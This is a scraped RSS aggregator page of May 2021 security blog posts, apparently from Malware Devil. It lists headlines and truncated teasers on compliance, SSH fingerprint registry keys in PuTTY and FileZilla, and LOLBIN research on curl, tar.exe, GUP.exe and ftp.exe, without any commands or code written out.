The post 3 Best Practices for Customizing Your Compliance Program appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/3-best-practices-for-customizing-your-compliance-program/?utm_source=rss&utm_medium=rss&utm_campaign=3-best-practices-for-customizing-your-compliance-program

6 Steps To Improve Your Data Security and Data Compliance

Data privacy has been a hot topic in the tech world for years now. With every new technology come new regulations that require companies to completely re-examine the way they handle private data. Most companies already have a basic data privacy policy they constructed alongside lawyers and tech experts to avoid facing serious fines and […]… Read More

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on The State of Security.

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Security Boulevard.

Read More

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/6-steps-to-improve-your-data-security-and-data-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=6-steps-to-improve-your-data-security-and-data-compliance

ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd

FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication

Read More

The post FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication/?utm_source=rss&utm_medium=rss&utm_campaign=fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication

A comparative study of neural network techniques for automatic software vulnerability detection

Read More

The post A comparative study of neural network techniques for automatic software vulnerability detection appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection/?utm_source=rss&utm_medium=rss&utm_campaign=a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection

Six things you have to know about ITAR compliance

  International Traffic in Arms Regulations (ITAR) is a set of regulations administered by the State Department to control the export of defense and military related technologies. The goal of the legislation is to control access to specific types of technology and their associated data by our country’s enemies.   Any U.S. company, research lab […]

The post Six things you have to know about ITAR compliance appeared first on PreVeil.

The post Six things you have to know about ITAR compliance appeared first on Security Boulevard.

Read More

The post Six things you have to know about ITAR compliance appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/six-things-you-have-to-know-about-itar-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=six-things-you-have-to-know-about-itar-compliance

PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd)

Many SSH clients can remember SSH servers’ fingerprints. This can serve as a safety mechanism: you get a warning when the server you want to connect to, has no longer the same fingerprint. And then you can decide what to do: continue with the connection, or stop and try to figure out what is going on.

This happened to me a couple of months ago. I wanted to transfer some files over SSH with FileZilla, and received a prompt that the server I usually connect to, had an unknown fingerprint. I did not go through with the connection, and started to investigate what was going on.

Long story short: I had removed SSH fingerprints cached by PuTTY in the Windows registry, and this impacted FileZilla: both use the same registry keys for their fingerprint cache.

You can see the registry keys here in FileZilla’s source code:

If you do forensics on Windows machines, be aware that these registry keys are not only used by PuTTY, but also by FileZilla’s fzsftp.exe module.

I have more details here if you are interested.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd/?utm_source=rss&utm_medium=rss&utm_campaign=putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd

Curo/bin

This post wraps up another Twitter thread I started a few days ago: If you ever get bored using “copy” to copy files you can always use … curl: curl […]
Read More

The post Curo/bin appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/curo-bin/?utm_source=rss&utm_medium=rss&utm_campaign=curo-bin

Throwing LOLBIN a tar ball

This post summarizes some of the findings I posted on Twitter the other day. While looking at Windows version of tar.exe I discovered that it includes lots of undocumented command […]
Read More

The post Throwing LOLBIN a tar ball appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/throwing-lolbin-a-tar-ball/?utm_source=rss&utm_medium=rss&utm_campaign=throwing-lolbin-a-tar-ball

Gup o/ bin

Notepad ++ comes with a built-in Updater called GUP typically located here: c:Program Files (x86)Notepad++updaterGUP.exe It is a generic downloader that accepts a range of command line arguments, and while […]
Read More

The post Gup o/ bin appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/gup-o-bin/?utm_source=rss&utm_medium=rss&utm_campaign=gup-o-bin

FTP.EXE Lolbin v2

@0gtweet‘s tweet inspired me to look at lolbin stuff again (as it is often the case). So… everyone knows we can use ftp.exe as a lolbin and using COMSPEC trick […]
Read More

The post FTP.EXE Lolbin v2 appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/ftp-exe-lolbin-v2/?utm_source=rss&utm_medium=rss&utm_campaign=ftp-exe-lolbin-v2